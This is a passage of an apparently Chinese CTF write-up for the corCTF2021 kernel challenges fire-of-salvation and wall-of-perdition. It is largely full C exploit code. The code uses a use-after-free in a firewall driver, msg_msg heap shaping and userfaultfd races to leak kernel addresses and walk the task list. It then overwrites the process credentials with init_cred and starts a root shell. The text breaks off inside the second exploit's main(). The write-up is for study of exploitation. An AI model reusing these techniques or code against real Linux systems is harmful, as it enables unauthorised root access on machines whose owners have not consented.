        exit(-1);
    }
    memset(page_buf, 0, PAGE_SIZE * 2);
    /* Bytes past DATALEN_MSG are the part stored via the `next` pointer. */
    *(size_t *) &page_buf[DATALEN_MSG] = init_cred;
    *(size_t *) &page_buf[DATALEN_MSG + 8] = init_cred;

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (size_t) page_buf;
    uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
    printf("[*] uffdio_copy.src: %#llx\n", (unsigned long long) uffdio_copy.src);
    printf("[*] uffdio_copy.dst: %#llx\n", (unsigned long long) uffdio_copy.dst);
    uffdio_copy.len = PAGE_SIZE * 2;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_COPY");
        exit(-1);
    }
    return NULL;
}

/*
 * Exploit entry point. Stages, in order:
 *   1. Open the driver; add, duplicate and delete rule 0 so that OUTBOUND
 *      slot 0 can still be edited after the delete.
 *   2. Send one message, then use edit_rule() on that slot to enlarge the
 *      message's m_ts and peek past its end to find a kernel offset.
 *   3. Point the header's `next` at init_task and walk tasks.prev until the
 *      entry whose pid equals getpid() is found.
 *   4. Repeat step 1 for rule 1, then send a message whose source buffer
 *      crosses into a userfaultfd-registered page; handler_thread performs
 *      the write while the send is stalled.
 *   5. Dump the current task once more and start a shell.
 *
 * Changes from the earlier version: shmat() failure is detected by comparing
 * with (void *) -1 (the former `< 0` test on a pointer could never fire),
 * the userfaultfd mapping is checked against MAP_FAILED, and integer values
 * are no longer printed with %p.
 */
int main() {
    bind_core(0);

    firewall_fd = open("/dev/firewall", O_RDWR);
    if (firewall_fd < 0) {
        puts("[-] failed to open firewall.");
        exit(-1);
    }

    add_rule(0, INBOUND);
    dup_rule(0, INBOUND);
    delete_rule(0, INBOUND);

    int msqid0 = get_msg_queue();
    memset(msgbuf.mtext, 'a', sizeof(msgbuf.mtext));
    write_msg(msqid0, &msgbuf, sizeof(msgbuf.mtext), 1);

    for (int i = 0; i < 0x500; i++) {
        int shm_id = shmget(114514, 0x1000, SHM_R | SHM_W | IPC_CREAT);
        if (shm_id < 0) {
            puts("[-] shmget failed.");
            exit(-1);
        }
        void *shm_addr = shmat(shm_id, NULL, 0);
        if (shm_addr == (void *) -1) {
            puts("[-] shmat failed.");
            exit(-1);
        }
    }

    /* invalid=true: only the leading bytes of the header are rewritten. */
    build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, 0, 0);
    edit_rule(0, fake_msg, OUTBOUND, true);

    memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
    printf("[*] peek_msg len: %#lx\n",
           (unsigned long) peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
    printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
    qword_dump("leak kernel addr from shm_file_data", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);

    size_t kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
    if (kernel_offset == INVALID_KERNEL_OFFSET) {
        puts("[-] failed to find kernel offset.");
        exit(-1);
    }

    init_cred += kernel_offset;
    init_task += kernel_offset;
    printf("[*] init_cred addr: %#lx\n", init_cred);
    printf("[*] init_task addr: %#lx\n", init_task);

    /* The fake segment starts 8 bytes before init_task's tasks member. */
    build_msg(fake_msg, 0, 0, 1919810, DATALEN_MSG + DATALEN_SEG, init_task + TASKS_OFFSET - 8, 0);
    edit_rule(0, fake_msg, OUTBOUND, false);
    memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
    printf("[*] peek_msg len: %#lx\n",
           (unsigned long) peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
    printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
    qword_dump("leak root cred addr from init_task", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

    uint64_t prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
    uint32_t pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
    printf("[*] init_task->tasks.prev: %#lx\n", prev);
    printf("[*] init_task->pid: %u\n", pid);
    printf("[*] current pid: %d\n", getpid());

    cur_task = init_task;
    while (pid != (uint32_t) getpid()) {
        build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, prev - 8, 0);
        edit_rule(0, fake_msg, OUTBOUND, false);
        printf("[*] peek_msg len: %#lx\n",
               (unsigned long) peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
        printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
        qword_dump("find task_struct", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);
        cur_task = prev - TASKS_OFFSET;
        printf("[*] task_struct addr: %#zx\n", cur_task);
        prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
        pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
        printf("[*] task_struct->tasks.prev: %#lx\n", prev);
        printf("[*] task_struct->pid: %u\n", pid);
    }

    printf("[+] find current task_struct addr: %#zx\n", cur_task);

    add_rule(1, INBOUND);
    dup_rule(1, INBOUND);
    delete_rule(1, INBOUND);

    /* First page is populated; the next two are left to userfaultfd. */
    char *uffd_page = mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (uffd_page == MAP_FAILED) {
        puts("[-] mmap failed.");
        exit(-1);
    }
    memset(uffd_page, 0, PAGE_SIZE);
    register_userfaultfd(uffd_page + PAGE_SIZE, PAGE_SIZE * 2, handler_thread);
    int msqid1 = get_msg_queue();
    /* mtype sits in the last 8 bytes of the populated page. */
    write_msg(msqid1, uffd_page + PAGE_SIZE - 8, DATALEN_MSG + 0x10, 1);

    build_msg(fake_msg, 0, 0, 123, DATALEN_MSG + DATALEN_SEG, cur_task + TASKS_OFFSET - 8, 0);
    edit_rule(0, fake_msg, OUTBOUND, false);
    memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
    printf("[*] peek_msg len: %#lx\n",
           (unsigned long) peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
    printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
    qword_dump("debug current task cred", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

    system("/bin/sh");

    return 0;
}

例题:corCTF2021 wall-of-perdition

这道题是 corCTF2021 fire-of-salvation 的加强版,主要区别是 UAF 的 object 不再是 kmalloc-4k 而是 kmalloc-64。因此这道题不能像上一题那样直接通过 userfaultfd + UAF 修改 next 实现任意地址写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Rule object quoted from the challenge (the UAF object discussed in the
 * surrounding text). Without EASY_MODE the visible fields add up to 46
 * bytes; with EASY_MODE a desc[DESC_MAX] array is appended.
 * NOTE(review): DESC_MAX is defined outside this snippet.
 */
typedef struct
{
char iface[16];
char name[16];
uint32_t ip;
uint32_t netmask;
uint16_t proto;
uint16_t port;
uint8_t action;
uint8_t is_duplicated;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} rule_t;

不过我们可以通过堆风水使得一个 kmalloc-4k 的 msg_msg 的 next 指向另一个 kmalloc-4k 的 msg_msg,再利用两个 userfaultfd 依次完成 next 的修改和任意地址写。具体流程如下。
首先按下图所示构造两个 msg_queue 并添加 msg_msg

通过 UAF 修改 m_ts 越界读泄露内核基址以及 msg_msg 地址。

参照上一题的方法找到本进程 task_struct 的地址。

之后释放第二个 msg_queue 中的那个 msg_msg + msg_msgseg 结构。

由于 SLAB 类似 fast bin 的堆管理机制,再次创建 msg_msg + msg_msgseg 结构时,msg_msg 与 msg_msgseg 对应的两个 object 会互换。也就是说之前泄露的 msg_msg 地址现在对应的是 msg_msgseg。

在再次创建 msg_msg + msg_msgseg 结构时我们用 userfaultfd 将其卡住。

之后 UAF 修改 msg_msg 的 next,使其指向之前泄露的 msg_msg,也就是新添加的 msg_msgseg。

释放刚才 UAF 的 msg_msg,从而将 msg_msgseg 也一起释放了。

之后再次添加一个 msg_msg + msg_msgseg 结构,并同样用 userfaultfd 卡住。至此已经完成了一个 kmalloc-4k 的 msg_msg 的 next 指向另一个 kmalloc-4k 的 msg_msg 的结构的构造。

利用两个 userfaultfd 可以完成任意地址写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <unistd.h>


/* Restrict the process identified by getpid() to the single CPU `core`. */
void bind_core(int core) {
    cpu_set_t mask;
    pid_t self = getpid();

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    /* The result is deliberately not checked, as in the rest of this file. */
    sched_setaffinity(self, sizeof(mask), &mask);
}

/*
 * Hex/ASCII dump of `len` bytes at `addr`, four 64-bit words per row.
 *
 * desc: optional heading printed before the dump (NULL to omit it).
 * addr: start of the region to dump.
 * len:  number of bytes; only whole 8-byte words produce rows.
 */
void qword_dump(char *desc, void *addr, int len) {
    uint64_t *words = (uint64_t *) addr;
    uint8_t *bytes = (uint8_t *) addr;
    int word_count = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < word_count; row += 4) {
        int base = row * 8; /* byte offset of this row */

        printf(" %04x", base);
        for (int col = 0; col < 4; col++) {
            if (row + col < word_count) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                printf(" ");
            }
        }
        printf(" ");
        /* ASCII column: up to 32 bytes, never past the end of the region. */
        for (int off = 0; off < 32 && base + off < len; off++) {
            uint8_t ch = bytes[base + off];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Return true when `addr` lies in [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF].
 * A tighter upper bound of 0xFFFFFFFF9FFFFFFF was considered by the author
 * but is not used.
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* Return true when `addr` lies in [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF]. */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* Sentinel returned when no offset could be derived from a value. */
#define INVALID_KERNEL_OFFSET 0x1145141919810

/* Known un-slid addresses that a leaked value is compared against. */
const size_t kernel_addr_list[] = {
    0xffffffff81c41600,
    0xffffffff81a159a0,
    0xffffffff81802f90,
    0xffffffff81802f80,
    0xffffffff814c1659,
    0xffffffff81b2de35,
    0xffffffff81b2de2a,
    0xffffffff81c4d961,
    0xffffffff81b2c42d
};

/*
 * Try to derive the slide of a leaked kernel-text value.
 *
 * A candidate from kernel_addr_list matches when the low 12 bits are equal
 * and the difference is a multiple of 0x100000. Returns that difference, or
 * INVALID_KERNEL_OFFSET when the value is not a kernel-text address or
 * matches no candidate (the latter case is also logged).
 */
size_t kernel_offset_query(size_t kernel_text_leak) {
    const size_t candidates = sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]);

    if (is_kernel_text_addr(kernel_text_leak)) {
        for (size_t idx = 0; idx < candidates; idx++) {
            size_t known = kernel_addr_list[idx];
            size_t delta = kernel_text_leak - known;

            if (((kernel_text_leak ^ known) & 0xFFF) != 0) {
                continue;
            }
            if (delta % 0x100000 == 0) {
                return delta;
            }
        }
        printf("[-] unknown kernel addr: %#lx\n", kernel_text_leak);
    }
    return INVALID_KERNEL_OFFSET;
}

/*
 * Scan `len` bytes at `buf` as an array of 8-byte words and return the first
 * offset that kernel_offset_query() accepts, or INVALID_KERNEL_OFFSET when no
 * word yields one.
 */
size_t search_kernel_offset(void *buf, int len) {
    size_t *words = buf;
    int word_count = len / 8;
    int pos = 0;

    while (pos < word_count) {
        size_t found = kernel_offset_query(words[pos]);

        if (found == INVALID_KERNEL_OFFSET) {
            pos++;
            continue;
        }
        printf("[+] kernel leak addr: %#lx\n", words[pos]);
        printf("[+] kernel offset: %#lx\n", found);
        return found;
    }
    return INVALID_KERNEL_OFFSET;
}

/* Doubly linked list node: two pointers, `next` first. */
struct list_head {
    struct list_head *next;
    struct list_head *prev;
};

/*
 * Userland mirror of the header placed in front of every message.
 * The message text follows the header immediately.
 */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    void *next;     /* really a struct msg_msgseg * */
    void *security; /* NULL without SELinux */
};

/* Header of a continuation segment; the segment's data follows immediately. */
struct msg_msgseg {
    struct msg_msgseg *next;
};

/* Fallback definition for headers that do not expose MSG_COPY. */
#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
/* Bytes of text that fit in one page after the respective header. */
#define DATALEN_MSG ((size_t) PAGE_SIZE - sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t) PAGE_SIZE - sizeof(struct msg_msgseg))

/* Create a private message queue (mode 0666) and return msgget()'s result. */
int get_msg_queue(void) {
    int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    return msqid;
}

/* Receive a message of type `msgtyp` with no flags; returns msgrcv()'s result. */
long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int no_flags = 0;
    long received = msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
    return received;
}

/*
 * Store `msgtyp` in the leading `long` of the buffer at `msgp`, then send
 * `msgsz` bytes of text with msgsnd() (no flags). Returns msgsnd()'s result.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    long *type_slot = msgp; /* mtype is the first member of the buffer */

    *type_slot = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/*
 * Non-destructive, non-blocking receive: calls msgrcv() with
 * MSG_COPY | IPC_NOWAIT | MSG_NOERROR. Returns msgrcv()'s result.
 */
long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;
    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

/*
 * Create a userfaultfd, register [addr, addr + len) for missing-page faults
 * and start `handler` in a new thread, passing the descriptor as its argument.
 * Any failing step prints its message and terminates the process.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    const char *failure;
    struct uffdio_api api_req = {.api = UFFD_API, .features = 0};
    struct uffdio_register reg_req = {
        .range = {.start = (unsigned long) addr, .len = len},
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };

    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    failure = "[-] Error at: userfaultfd";
    if (uffd == -1) {
        goto die;
    }

    failure = "[-] Error at: ioctl-UFFDIO_API";
    if (ioctl(uffd, UFFDIO_API, &api_req) == -1) {
        goto die;
    }

    failure = "[-] Error at: ioctl-UFFDIO_REGISTER";
    if (ioctl(uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        goto die;
    }

    failure = "[-] Error at: pthread_create";
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        goto die;
    }
    return;

die:
    puts(failure);
    exit(-1);
}

/*
 * Argument structure handed to every ioctl on firewall_fd.
 * NOTE(review): the field order and sizes presumably have to match the
 * driver's own definition, which is not part of this file - do not reorder.
 */
typedef struct {
char iface[16];
char name[16];
char ip[16];      /* dotted-quad text, e.g. "0.0.0.0" (see add_rule) */
char netmask[16]; /* dotted-quad text */
uint8_t idx;      /* rule slot */
uint8_t type;     /* INBOUND or OUTBOUND */
uint16_t proto;
uint16_t port;
uint8_t action;
} user_rule_t;


/* Descriptor of /dev/firewall; opened in main and used by all rule helpers. */
int firewall_fd;
/* Rule list selector stored in user_rule_t.type. */
enum {
INBOUND,
OUTBOUND
};

int add_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0x1337BABE, &(user_rule_t) {.type = type, .idx = idx, .ip = "0.0.0.0", .netmask = "0.0.0.0"});
}

int dup_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xBAAD5AAD, &(user_rule_t) {.type = type, .idx = idx});
}

int delete_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xDEADBABE, &(user_rule_t) {.type = type, .idx = idx});
}

/*
 * Format `val` as dotted-quad text into `buf`, least significant byte first
 * (0x0100007f becomes "127.0.0.1").
 *
 * buf: destination; needs at least 16 bytes ("255.255.255.255" plus NUL).
 * val: the four address bytes packed into a 32-bit value.
 *
 * The octets are unsigned, so they are printed with %u (the previous %d did
 * not match the argument type).
 */
void inet_ntoa(char *buf, uint32_t val) {
    unsigned int b0 = val & 0xFFu;
    unsigned int b1 = (val >> 8) & 0xFFu;
    unsigned int b2 = (val >> 16) & 0xFFu;
    unsigned int b3 = (val >> 24) & 0xFFu;

    sprintf(buf, "%u.%u.%u.%u", b0, b1, b2, b3);
}

int edit_rule(uint8_t idx, void *buf, uint8_t type, bool invalid) {
user_rule_t rule = {.type = type, .idx = idx};
memcpy(&rule, buf, 0x20);
if (invalid) {
strcpy(rule.ip, "invalid");
strcpy(rule.netmask, "invalid");
} else {
inet_ntoa(rule.ip, *(uint32_t *) &buf[0x20]);
inet_ntoa(rule.netmask, *(uint32_t *) &buf[0x24]);
}
memcpy(&rule.proto, &buf[0x28], 2);
memcpy(&rule.port, &buf[0x2a], 2);
memcpy(&rule.action, &buf[0x2c], 2);
return ioctl(firewall_fd, 0x1337BEEF, &rule);
}

/* Message whose header plus text occupies exactly 0x40 bytes. */
struct {
long mtype;
char mtext[0x40 - sizeof(struct msg_msg)];
} small_msgbuf;

/* Message with a full first part plus a full segment part. */
struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} large_msgbuf;

/* Receive buffer for peek_msg(), same capacity as large_msgbuf. */
struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

/* Scratch buffer in which fake msg_msg headers are built for edit_rule(). */
char fake_msg[0x2000];

/* Addresses before relocation; main adds the leaked kernel offset to both. */
size_t init_cred = 0xFFFFFFFF81C33060;
size_t init_task = 0xFFFFFFFF81C124C0;
/* cur_task: current task_struct address; large_msg_addr: -1 until leaked. */
size_t cur_task, large_msg_addr = -1;
/* Queue ids: [0] and [1] are created in main, [2] in change_next, [3] in change_cred. */
int msq_id[4];
/*
 * Hand-off flags between threads:
 *   steps[0] set by change_next_thread, awaited by change_cred
 *   steps[1] set by change_cred_thread, awaited by change_next_thread
 *   steps[2] set by change_next,        awaited by change_cred_thread
 */
bool steps[3];

/*
 * Byte offsets inside task_struct.
 * NOTE(review): presumably specific to the target kernel build - confirm.
 */
#define TASKS_OFFSET 0x298
#define PID_OFFSET 0x398
#define CRED_OFFSET 0x540

/*
 * userfaultfd monitor for the send started in change_next(); `arg` carries
 * the userfaultfd descriptor.
 *
 * On the first page-fault event it sets steps[0], waits for steps[1], and
 * then resolves the fault with two fresh pages. Those pages contain a fake
 * msg_msg header that starts 8 bytes before DATALEN_MSG and whose `next` is
 * cur_task + CRED_OFFSET - 0x10.
 *
 * Any failure prints a message and terminates the process. Returns NULL.
 *
 * The flags are accessed with atomic loads/stores: the previous plain
 * busy-wait was a data race that allowed the load to be hoisted out of the
 * loop.
 */
void *change_next_thread(void *arg) {
    long uffd = (long) arg;
    struct pollfd pollfd = {.fd = (int) uffd, .events = POLLIN};
    struct uffd_msg msg;

    if (poll(&pollfd, 1, -1) == -1) {
        puts("[-] Error at: poll");
        exit(-1);
    }

    ssize_t nread = read((int) uffd, &msg, sizeof(msg));
    if (nread == 0) {
        puts("[-] Error at: EOF on userfaultfd!");
        exit(EXIT_FAILURE);
    }
    if (nread == -1) {
        puts("[-] Error at: read");
        exit(-1);
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
        puts("[-] Unexpected event on userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* Announce that this send is stalled, then wait for the second one. */
    __atomic_store_n(&steps[0], true, __ATOMIC_RELEASE);
    while (!__atomic_load_n(&steps[1], __ATOMIC_ACQUIRE)) {
    }

    char *page_buf = mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page_buf == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    build_msg(page_buf + DATALEN_MSG - 8, 0, 0, 0, DATALEN_MSG + 0x10, cur_task + CRED_OFFSET - 0x10, 0);

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (size_t) page_buf;
    uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
    printf("[*] uffdio_copy.src: %#llx\n", (unsigned long long) uffdio_copy.src);
    printf("[*] uffdio_copy.dst: %#llx\n", (unsigned long long) uffdio_copy.dst);
    uffdio_copy.len = PAGE_SIZE * 2;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_COPY");
        exit(-1);
    }
    return NULL;
}

/*
 * userfaultfd monitor for the send started in change_cred(); `arg` carries
 * the userfaultfd descriptor.
 *
 * On the first page-fault event it sets steps[1], waits for steps[2], and
 * then resolves the fault with two fresh pages that hold init_cred in the
 * two 8-byte slots at DATALEN_MSG and DATALEN_MSG + 8.
 *
 * Any failure prints a message and terminates the process. Returns NULL.
 *
 * The flags are accessed with atomic loads/stores: the previous plain
 * busy-wait was a data race that allowed the load to be hoisted out of the
 * loop.
 */
void *change_cred_thread(void *arg) {
    long uffd = (long) arg;
    struct pollfd pollfd = {.fd = (int) uffd, .events = POLLIN};
    struct uffd_msg msg;

    if (poll(&pollfd, 1, -1) == -1) {
        puts("[-] Error at: poll");
        exit(-1);
    }

    ssize_t nread = read((int) uffd, &msg, sizeof(msg));
    if (nread == 0) {
        puts("[-] Error at: EOF on userfaultfd!");
        exit(EXIT_FAILURE);
    }
    if (nread == -1) {
        puts("[-] Error at: read");
        exit(-1);
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
        puts("[-] Unexpected event on userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* Let change_next_thread continue, then wait until its send returned. */
    __atomic_store_n(&steps[1], true, __ATOMIC_RELEASE);
    while (!__atomic_load_n(&steps[2], __ATOMIC_ACQUIRE)) {
    }

    char *page_buf = mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page_buf == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    *(size_t *) &page_buf[DATALEN_MSG] = init_cred;
    *(size_t *) &page_buf[DATALEN_MSG + 8] = init_cred;

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (size_t) page_buf;
    uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
    printf("[*] uffdio_copy.src: %#llx\n", (unsigned long long) uffdio_copy.src);
    printf("[*] uffdio_copy.dst: %#llx\n", (unsigned long long) uffdio_copy.dst);
    uffdio_copy.len = PAGE_SIZE * 2;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_COPY");
        exit(-1);
    }
    return NULL;
}

/*
 * Thread body: sends a message on a new queue (msq_id[2]) from a buffer
 * whose last two pages are registered with userfaultfd, so the send stalls
 * until change_next_thread resolves the fault. Sets steps[2] once the send
 * has returned. `arg` is unused.
 *
 * Returns NULL (the earlier version had no return statement), and the
 * mapping is now checked against MAP_FAILED.
 */
void *change_next(void *arg) {
    (void) arg;

    char *change_next_page = mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (change_next_page == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    /* Only the first page is populated; the rest must fault. */
    memset(change_next_page, 0, PAGE_SIZE);
    register_userfaultfd(change_next_page + PAGE_SIZE, PAGE_SIZE * 2, change_next_thread);
    msq_id[2] = get_msg_queue();
    /* mtype sits in the last 8 bytes of the populated page. */
    write_msg(msq_id[2], change_next_page + PAGE_SIZE - 8, DATALEN_MSG + DATALEN_MSG, 1);
    __atomic_store_n(&steps[2], true, __ATOMIC_RELEASE);
    return NULL;
}

/*
 * Thread body: once steps[0] is set, rewrites the object behind OUTBOUND
 * rule 0 with a fake header whose `next` is large_msg_addr, receives that
 * message (type 123) from msq_id[0], and then sends a message on a new
 * queue (msq_id[3]) from a buffer whose last two pages are registered with
 * userfaultfd and served by change_cred_thread. `arg` is unused.
 *
 * Returns NULL (the earlier version had no return statement). The wait on
 * steps[0] uses an atomic load instead of a plain read, and the mapping is
 * checked against MAP_FAILED.
 */
void *change_cred(void *arg) {
    (void) arg;

    while (!__atomic_load_n(&steps[0], __ATOMIC_ACQUIRE)) {
    }

    build_msg(fake_msg, init_task + 0x1000, init_task + 0x1000, 123, sizeof(small_msgbuf.mtext), large_msg_addr, 0);
    edit_rule(0, fake_msg, OUTBOUND, false);
    read_msg(msq_id[0], &large_msgbuf, sizeof(large_msgbuf.mtext), 123);

    char *change_cred_page = mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (change_cred_page == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    /* Only the first page is populated; the rest must fault. */
    memset(change_cred_page, 0, PAGE_SIZE);
    register_userfaultfd(change_cred_page + PAGE_SIZE, PAGE_SIZE * 2, change_cred_thread);
    msq_id[3] = get_msg_queue();
    write_msg(msq_id[3], change_cred_page + PAGE_SIZE - 8, DATALEN_MSG + 0x10, 1);
    return NULL;
}

/*
 * Exploit entry point.
 *
 * Sequence, as visible in this function:
 *   1. Open /dev/firewall and run add/dup/delete on rule 0 (INBOUND).
 *   2. Queue one small message on msq_id[0] and a small + large message on
 *      msq_id[1].
 *   3. Write a fake msg_msg header through edit_rule(0, ..., OUTBOUND, ...) and
 *      peek msq_id[0] to read DATALEN_MSG bytes; scan the result for the
 *      0x114514 message to learn large_msg_addr and the kernel offset.
 *   4. Re-point the fake header's segment pointer at task_struct->tasks and
 *      walk tasks.prev from init_task until the pid matches getpid().
 *   5. Receive the large message, run change_next / change_cred in threads,
 *      then spawn a shell.
 *
 * NOTE(review): step 1 presumably leaves a dangling OUTBOUND reference to the
 * freed rule (use-after-free) — confirm against the driver.
 */
int main() {
    bind_core(0);

    firewall_fd = open("/dev/firewall", O_RDWR);
